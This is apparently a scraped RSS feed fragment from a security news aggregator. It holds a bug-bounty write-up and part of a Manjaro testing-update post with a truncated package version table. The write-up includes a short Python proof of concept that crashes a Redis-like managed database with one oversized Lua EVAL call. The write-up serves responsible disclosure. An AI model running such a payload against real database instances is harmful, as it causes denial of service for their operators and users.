<p>Dieser Beitrag <a href="https://www.it-boltwise.de/gefaehrliche-npm-pakete-zielen-auf-redis-und-postgresql.html">Gefährliche npm-Pakete zielen auf Redis und PostgreSQL</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[“Not Applicable” to Victory: How I Escalated a P2 DoS Vulnerability on Bugcrowd]]></title>
<description><![CDATA[Bug bounty hunting is full of emotional rollercoasters. One day you find a critical vulnerability, and the next day you receive the dreaded “Not Applicable” (N/A) status. This is the story of how I found a Priority 2 (P2) Denial of Service (DoS) bug on a managed cloud platform, got hit with an N/...]]></description>
<link>https://tsecurity.de/de/3395108/hacking/not-applicable-to-victory-how-i-escalated-a-p2-dos-vulnerability-on-bugcrowd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3395108/hacking/not-applicable-to-victory-how-i-escalated-a-p2-dos-vulnerability-on-bugcrowd/</guid>
<pubDate>Tue, 31 Mar 2026 08:34:54 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8eezDXpdKjH_sGhT_wU9KQ.png"></figure><p>Bug bounty hunting is full of emotional rollercoasters. One day you find a critical vulnerability, and the next day you receive the dreaded “Not Applicable” (N/A) status. This is the story of how I found a Priority 2 (P2) Denial of Service (DoS) bug on a managed cloud platform, got hit with an N/A, and successfully appealed to get it recognized, earning reputation points and proving the impact.</p><p>If you’ve ever had a valid bug rejected because it was an “upstream issue,” this article is for you.</p><h3>The Target and The Recon</h3><p>I was hunting on a public Bugcrowd program for a prominent Managed Cloud Database Provider. Their platform allows users to spin up various managed databases (let’s call the specific engine I was testing <strong>TargetDB</strong>, which acts as a modern, high-performance alternative to Redis).</p><p>While exploring the capabilities of TargetDB, I decided to test how it handles custom Lua scripts via the EVAL command. Lua scripting in Redis-like databases is a known attack surface, especially when it comes to resource exhaustion.</p><h3>The Vulnerability: Uncontrolled Resource Consumption</h3><p>During my research, I noticed that TargetDB implemented a custom Lua function let’s call it db.randstr(). This function was designed to generate random strings, presumably for testing or data generation.</p><p>However, I realized that this function lacked proper bounds checking. I asked myself: <em>What happens if I ask the server to generate a string that is 1 Billion characters long?</em></p><p>Since the database operates entirely in-memory, forcing it to generate and return massive chunks of data could lead to extreme memory allocation, network congestion, and eventually, a full process crash.</p><h3>The Exploit (Proof of Concept)</h3><p>I quickly wrote a Python script to test my theory. Using a standard Redis client, I authenticated as a low-privileged database user and executed the following payload:</p><pre>import redis<br>import time<br><br># Connect to the managed database instance<br>r = redis.from_url("rediss://default:&lt;password&gt;@&lt;target-host&gt;:&lt;port&gt;")<br><br>print("[*] Triggering the payload...")<br><br># Executing the custom function with an extremely large integer<br># Payload: return db.randstr(1000000000)<br>start_time = time.time()<br>try:<br>    r.execute_command("EVAL", "return db.randstr(1000000000)", "0")<br>except Exception as e:<br>    print(f"[!] Exception caught: {e}")<br><br>print(f"[*] Response time: {time.time() - start_time} seconds")</pre><p><strong>The Impact was immediate and catastrophic:</strong></p><ul><li><strong>Latency Spike:</strong> The server latency shot up from a normal 0.17s to over 27 seconds.</li><li><strong>Network Exhaustion:</strong> The INFO STATS command revealed that total_net_output_bytes instantly spiked by approximately <strong>1 GB</strong> in a single request.</li><li><strong>Process Crash:</strong> The most critical impact was the server uptime. The database engine couldn’t handle the memory allocation and crashed. The managed infrastructure automatically restarted the process, resetting the database uptime from <strong>4761 seconds back to 1 second</strong>.</li></ul><p>I had successfully found a single-command DoS that completely took down the managed instance. According to the Bugcrowd Vulnerability Rating Taxonomy (VRT), an Application-Level DoS with critical impact falls under <strong>P2</strong>.</p><h3>The Plot Twist: “Not Applicable”</h3><p>I recorded a video PoC, took screenshots of the INFO metrics, and submitted the report.</p><p>A few days later, the triage team responded. They confirmed that the bug was 100% reproducible and valid. However, they marked the report as <strong>Not Applicable (N/A)</strong>.</p><p><em>Why?</em> Because TargetDB is an open-source “upstream” project. The cloud provider’s policy stated that vulnerabilities existing in the upstream source code are not eligible for bounties, and researchers should report them directly to the open-source maintainers.</p><h3>The Appeal: Knowing the Rules of the Game</h3><p>Getting an N/A on a valid P2 bug is painful, especially because it doesn’t give you any reputation points for your hard work. But instead of giving up, I carefully read the program’s brief again.</p><p>I formulated an appeal based on their own rules:</p><ul><li><strong>Material Impact:</strong> The program stated they cared about “real-world vulnerabilities with material security impact.” A 1GB network spike and a full instance crash definitely fit the bill.</li><li><strong>Platform Resilience:</strong> The provider marketed their service as having “high fault resilience.” A single authenticated user crashing the system directly contradicted this guarantee.</li><li><strong>Points over Bounty:</strong> I clarified that while I understood the <em>bounty</em> exclusion for upstream bugs, the finding was undeniably valid. I requested that the status be changed to <strong>Informational</strong> so I could at least receive the reputation points I earned.</li></ul><p><em>Always be polite and professional when appealing. Use the program’s own terminology to make your case.</em></p><h3>The Victory</h3><p>A day later, the triage team got back to me. They agreed with my logic! Because the exploit had a demonstrable, severe impact on their managed infrastructure, they changed the status from “Not Applicable” to <strong>“Informational”</strong> and awarded me <strong>20 Reputation Points</strong>.</p><p>Furthermore, having the cloud provider confirm the bug is “Reproducible” gave me incredible leverage when I subsequently reported the 0-day directly to the upstream open-source team.</p><h3>Takeaways for Fellow Hunters</h3><ul><li><strong>Look beyond standard commands:</strong> Custom functions in databases (like Lua scripts or modules) are often less tested than core commands.</li><li><strong>Read the Policy:</strong> Knowing the difference between an Out-of-Scope target and an Upstream rule can save your report.</li><li><strong>Don’t be afraid to appeal:</strong> If your PoC is solid and proves real-world impact, politely argue your case. A “Not Applicable” isn’t always the end of the road.</li><li><strong>Take it upstream:</strong> If a cloud provider won’t pay you for an upstream bug, take that validated PoC straight to the vendor. You might get a CVE or a bounty from them directly!</li></ul><p>Happy Hacking!</p><p>#BugBounty #CyberSecurity #EthicalHacking #Bugcrowd #Infosec #DoS #0day #PenetrationTesting #CloudSecurity #HackerCommunity</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*j7RTxbtJRT0oAeLBdXX6Yg.png"></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c5fa05ab4727" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/not-applicable-to-victory-how-i-escalated-a-p2-dos-vulnerability-on-bugcrowd-c5fa05ab4727">“Not Applicable” to Victory: How I Escalated a P2 DoS Vulnerability on Bugcrowd</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-03-31 - Linux 7.0-rc6, Thunderbird, Deepin, Freecad, Wireplumber, haskell]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to 7.0 series. Also there will be Plasma 6.6 series, KDE Gears 26.04 and GNOME 50 ...]]></description>
<link>https://tsecurity.de/de/3394814/unix-server/testing-update-2026-03-31-linux-70-rc6-thunderbird-deepin-freecad-wireplumber-haskell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3394814/unix-server/testing-update-2026-03-31-linux-70-rc6-thunderbird-deepin-freecad-wireplumber-haskell/</guid>
<pubDate>Tue, 31 Mar 2026 06:00:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to <a href="https://www.heise.de/en/news/Linux-Torvalds-starts-development-of-Kernel-7-0-11186358.html">7.0</a> series. Also there will be <a href="https://kde.org/announcements/plasma/6/6.6.0/">Plasma 6.6</a> series, <a href="https://community.kde.org/Schedules/KDE_Gear_26.04_Schedule">KDE Gears 26.04</a> and <a href="https://release.gnome.org/50/">GNOME 50</a> release series. XFCE will stay at <a href="https://www.xfce.org/about/tour420">4.20</a> this release cycle. A release of ‘Bian-May’ can be expected end of April, beginning of May. Let us know any issues you may found thus far …</p>
<h3><a name="p-850257-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-850257-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-850257-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-850257-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<h2><a name="p-850257-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-850257-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> 7.0 got updated to <a href="https://lore.kernel.org/lkml/CAHk-=wgLvq1LucHhxjiPwDBkMRk=54Zh=-FmUdevXJyHygc=9A@mail.gmail.com/T/#u">7.0-rc6</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/149.0.1/releasenotes/">149.0.1</a></li>
<li>Some updates to <strong>Deepin</strong></li>
<li><strong>freecad</strong> <a href="https://blog.freecad.org/2026/03/25/freecad-version-1-1-released/">1.1.0</a></li>
<li>Rebuilds and updates to <strong>haskell</strong></li>
<li><strong>wireplumber</strong> <a href="https://gitlab.com/pipewire/wireplumber/-/blob/07e730b279ac7a520699ae9f6b0797848a731b30/NEWS.rst">0.5.14</a></li>
</ul>
<h2><a name="p-850257-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-850257-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.252</li>
<li>linux515 5.15.202</li>
<li>linux61 6.1.167</li>
<li>linux66 6.6.130</li>
<li>linux612 6.12.78</li>
<li>linux618 6.18.20</li>
<li>linux619 6.19.10</li>
<li>linux70 7.0.0rc6</li>
<li>linux61-rt 6.1.166_rt61</li>
<li>linux66-rt 6.6.129_rt70</li>
<li>linux612-rt 6.12.74_rt16</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (3/31/26 05:17 CEST)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  1131 new and 1127 removed package(s)</li>
<li>testing multilib x86_64:  8 new and 8 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             linux70           7.0.0rc5-1           7.0.0rc6-1
                     linux70-headers           7.0.0rc5-1           7.0.0rc6-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                                file               5.47-1               5.47-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             discord          1:0.0.131-1                    -
                   linux70-acpi_call            1.2.2-0.5            1.2.2-0.6
                    linux70-bbswitch              0.8-0.5              0.8-0.6
                 linux70-broadcom-wl     6.30.223.271-0.5     6.30.223.271-0.6
                linux70-nvidia-470xx       470.256.02-0.5       470.256.02-0.6
                 linux70-nvidia-open        595.58.03-0.1        595.58.03-0.2
                       linux70-r8168         8.056.02-0.5         8.056.02-0.6
                   linux70-rtl8723bu         20250813-0.5         20250813-0.6
                    linux70-tp_smapi             0.45-0.5             0.45-0.6
                 linux70-vhba-module         20250329-0.5         20250329-0.6
     linux70-virtualbox-host-modules            7.2.6-0.5            7.2.6-0.6
                         linux70-zfs            2.4.1-0.5            2.4.1-0.6


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                          abseil-cpp         20250814.1-1         20260107.1-1
                               afl++              4.35c-2              4.40c-1
                                agda          2.6.4.3-119          2.6.4.3-121
                          aliyun-cli              3.2.9-1              3.3.3-1
                              allure         0.11.0.0-317         0.11.0.0-320
                          amdgpu_top             0.11.2-1             0.11.3-1
                       android-tools            35.0.2-23            35.0.2-24
                          apache-orc              2.3.0-2              2.3.0-3
                                apko             1.1.16-1              1.2.0-1
                               arbtt         0.12.0.3-185         0.12.0.3-187
                             arch-hs            0.12.1-66            0.12.1-70
                      argo-workflows              4.0.2-1              4.0.3-1
                               arrow             23.0.1-2             23.0.1-3
                             astroid               0.17-8               0.17-9
                           astroterm             1.0.10-1              1.1.0-1
                           aws-vault              7.9.7-1             7.9.13-1
                              azcopy            10.32.1-1            10.32.2-1
                       bbswitch-dkms              0.8-806              0.8-807
                       bcachefs-dkms           3:1.37.3-1           3:1.37.4-1
                      bcachefs-tools           3:1.37.3-1           3:1.37.4-1
                               beets              2.7.1-1              2.8.0-1
                               bftpd                6.3-1                6.6-1
                              bloaty               1.1-22               1.1-23
                            bpftrace             0.25.0-1             0.25.1-1
                                brat              0.9.0-2             0.10.0-1
                                 bun             1.3.11-1             1.3.11-2
                               byobu               6.14-1               6.15-1
                       cabal-install          3.10.3.0-15          3.10.3.0-18
                          cabal-plan          0.7.3.0-128          0.7.3.0-130
                      cargo-binstall             1.17.8-2             1.17.9-1
                         cargo-insta             1.47.0-1             1.47.2-1
                        cargo-update             18.2.0-2             19.0.1-1
                             castxml              0.7.0-1              0.7.0-2
                           cbor-tool          0.2.3.0-124          0.2.3.0-126
                              ccache             4.13.1-1             4.13.2-1
                               cgrep             8.1.0-94             8.1.0-97
                              chatty              0.8.9-1              0.8.9-2
                          cherrytree              1.6.3-1              1.6.3-2
                           clash-ghc             1.8.2-97            1.8.2-100
                          cockatrice             2.10.3-1             2.10.3-2
                               crash              9.0.1-1              9.0.1-2
                             cryptol             3.3.0-47             3.3.0-50
                                 cue             0.15.4-1             0.16.0-1
                    curl-impersonate              1.5.1-1              1.5.2-1
                                cyme             2.2.11-2              2.3.0-1
                               darcs           2.18.5-191           2.18.5-194
                             dbeaver             26.0.0-1             26.0.1-1
                     deepin-anything             6.2.11-1              7.0.0-2
                deepin-anything-dkms             6.2.11-1              7.0.0-2
                          deepin-api             6.0.35-1             6.0.37-1
                 deepin-app-services             1.0.40-1             1.0.41-1
          deepin-application-manager             1.2.42-1             1.2.44-1
                     deepin-calendar             6.5.17-1             6.5.18-1
                    deepin-clipboard              6.1.7-1              6.1.8-1
                   deepin-compressor              6.5.9-1             6.5.11-1
               deepin-control-center             6.1.13-1             6.1.15-1
                       deepin-daemon             6.1.46-4             6.1.49-1
                deepin-desktop-theme             1.1.16-1             1.1.18-1
             deepin-device-formatter           0.0.1.18-2              1.5.1-1
                         deepin-draw             6.5.25-1             6.5.26-1
                       deepin-editor             6.5.41-1             6.5.42-1
                 deepin-grand-search              5.4.7-3              5.4.9-1
                    deepin-launchpad             2.0.25-3             2.0.26-1
                        deepin-movie          1:5.10.45-1          1:5.10.46-1
                 deepin-network-core             2.0.42-1             2.0.43-1
               deepin-qt5integration             5.7.30-2             6.7.31-1
          deepin-qt5platform-plugins             5.7.30-2             6.7.31-1
               deepin-qt6integration             6.0.48-3             6.7.31-1
          deepin-qt6platform-plugins             6.0.48-3             6.7.31-1
                  deepin-screensaver             5.0.19-2             5.0.20-1
                     deepin-services             1.0.19-1             1.0.21-1
                      deepin-session             2.0.15-2             2.0.17-1
                        deepin-shell             2.0.27-3             2.0.29-1
               deepin-system-monitor             6.5.19-2             6.5.21-1
                     deepin-terminal             6.5.28-3             6.5.29-1
                  deepin-tray-loader             2.0.24-3             2.0.26-1
                        deepin-turbo            0.0.6.2-1            0.0.6.3-1
                     deepin-util-dfm             1.2.29-1             1.2.31-1
                   deepin-wallpapers            1:1.7.8-1           1:1.7.14-1
                      deepin-widgets             6.0.18-2             6.0.20-1
                               dhall            1.42.3-45            1.42.3-48
                          dhall-bash           1.0.41-176           1.0.41-180
                          dhall-docs           1.0.12-168           1.0.12-171
                          dhall-json           1.7.12-172           1.7.12-175
                    dhall-lsp-server            1.1.4-102            1.1.4-106
                          dhall-yaml           1.2.12-177           1.2.12-180
                       diff-so-fancy              1.4.6-1              1.4.8-1
                          diffoscope                313-1                315-1
                             discord          1:0.0.130-1          1:0.0.131-1
                             dovecot              2.4.3-1              2.4.3-2
                               drone             2.28.0-1             2.28.1-1
                           drone-oss             2.28.0-1             2.28.1-1
                            dtk6core           1:6.7.32-2           1:6.7.33-1
                     dtk6declarative           1:6.7.32-2           1:6.7.33-1
                             dtk6gui           1:6.7.32-2           1:6.7.33-1
                             dtk6log             6.7.32-2             6.7.33-1
                          dtk6widget           1:6.7.32-2           1:6.7.33-1
                             dtkcore           1:6.7.32-2           1:6.7.33-1
                      dtkdeclarative           1:6.7.32-2           1:6.7.33-1
                              dtkgui           1:6.7.32-2           1:6.7.33-1
                              dtklog             6.7.32-2             6.7.33-1
                           dtkwidget           1:6.7.32-2           1:6.7.33-1
                               dunst             1.13.1-1             1.13.2-1
                         easyeffects              8.1.7-1              8.1.8-1
                              emptty             0.16.0-1             0.16.1-1
               evolution-data-server             3.58.3-1             3.58.3-2
          evolution-data-server-docs             3.58.3-1             3.58.3-2
                  falcosecurity-libs             0.20.0-9             0.23.1-1
                           fastfetch             2.60.0-1             2.61.0-1
           firefox-developer-edition            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ach            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-af            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-an            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ar            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ast            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-az            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-be            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-br            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ca-valencia      150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-cak            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cy            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-da            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-de            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-dsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-el            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-gb            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-us            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eo            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-ar            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-cl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-es            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-mx            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-et            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eu            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fa            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ff            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-fur            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-fy-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ga-ie            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gd            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-gu-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-he            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hi-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-hsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hu            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hy-am            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ia            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-id            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-is            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-it            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ja            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ka            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-kab            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-km            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ko            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-lij            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lv            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ms            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-my            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nb-no            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ne-np            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nn-no            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-oc            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pa-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-pl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-br            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-pt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-rm            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ro            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ru            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sat            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sc            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sco            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-si            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sk            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-skr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sl            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-son            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sq            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sr            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-sv-se            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-szl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ta            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-te            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-th            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-trs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ur            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uz            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-vi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-xh            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-cn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-tw            150.0b2-1            150.0b3-1
                             freecad             1.0.2-10              1.1.0-2
                      freeciv-common              3.2.2-6              3.2.4-1
                        freeciv-gtk3              3.2.2-6              3.2.4-1
                        freeciv-gtk4              3.2.2-6              3.2.4-1
                          freeciv-qt              3.2.2-6              3.2.4-1
                           ft2-clone               2.12-1               2.13-1
                                 gdb               17.1-2               17.1-3
                          gdb-common               17.1-2               17.1-3
                                gegl             0.4.68-1             0.4.70-1
                          gemini-cli           1:0.35.2-1           1:0.35.3-1
                                gimp              3.2.0-1              3.2.2-1
                           git-annex       10.20251215-14       10.20251215-19
                           git-delta             0.19.1-1             0.19.2-1
                          git-repair       1.20230814-189       1.20230814-190
                               gitit         0.15.1.2-121         0.15.1.2-127
                             glances              4.5.2-2              4.5.3-1
                               glirc            2.40.1-70            2.40.1-74
           globalprotect-openconnect              2.5.1-2              2.5.1-3
                                  gn    0.2324.304bbef6-1    0.2324.304bbef6-2
                      gnuradio-iqbal             0.38.3-2             0.38.3-3
                       golangci-lint             2.11.3-1             2.11.4-1
                         google-glog              0.7.1-1              0.7.1-2
                                grpc             1.78.1-2             1.80.0-1
                            grpc-cli             1.78.1-2             1.80.0-1
                                gvim           9.2.0204-2           9.2.0272-1
                              hamlib              4.6.5-3              4.7.0-1
                           hardinfo2             2.2.16-1             2.2.16-2
                 haskell-adjunctions            4.4.3-102              4.4.4-1
                       haskell-aeson            2.2.1.0-5            2.2.1.0-7
         haskell-aeson-better-errors           0.9.1.3-73           0.9.1.3-75
                haskell-aeson-casing          0.2.0.0-233          0.2.0.0-235
                  haskell-aeson-diff         1.1.0.13-267         1.1.0.13-269
                haskell-aeson-pretty           0.8.10-150           0.8.10-152
                    haskell-aeson-qq            0.8.4-335            0.8.4-337
        haskell-aeson-warning-parser             0.1.1-89             0.1.1-91
                  haskell-aeson-yaml          1.1.0.1-349          1.1.0.1-351
                haskell-apply-refact          0.14.0.0-63          0.14.0.0-64
                    haskell-arch-web             0.3.2-54             0.3.2-58
                    haskell-arithmoi          0.13.2.0-32          0.13.2.0-35
            haskell-attoparsec-aeson            2.2.0.0-7            2.2.0.0-9
                haskell-authenticate          1.3.5.2-250          1.3.5.2-253
          haskell-authenticate-oauth              1.7-373              1.7-375
                         haskell-aws             0.24.2-9            0.24.2-12
              haskell-binary-conduit            1.3.1-588            1.3.1-590
            haskell-binary-instances            1.0.4-161            1.0.4-163
               haskell-binary-tagged            0.3.1-332            0.3.1-334
                      haskell-bitvec           1.1.5.0-43           1.1.5.0-45
                  haskell-bower-json          1.1.0.0-229          1.1.0.0-231
                  haskell-breakpoint           0.1.4.0-20            0.1.5.0-1
                     haskell-butcher          1.3.3.2-508          1.3.3.2-510
                    haskell-bv-sized             1.0.6-96             1.0.6-99
                  haskell-byte-order          0.1.3.1-161          0.1.3.1-163
   haskell-bytestring-strict-builder           0.4.5.8-76           0.4.5.8-78
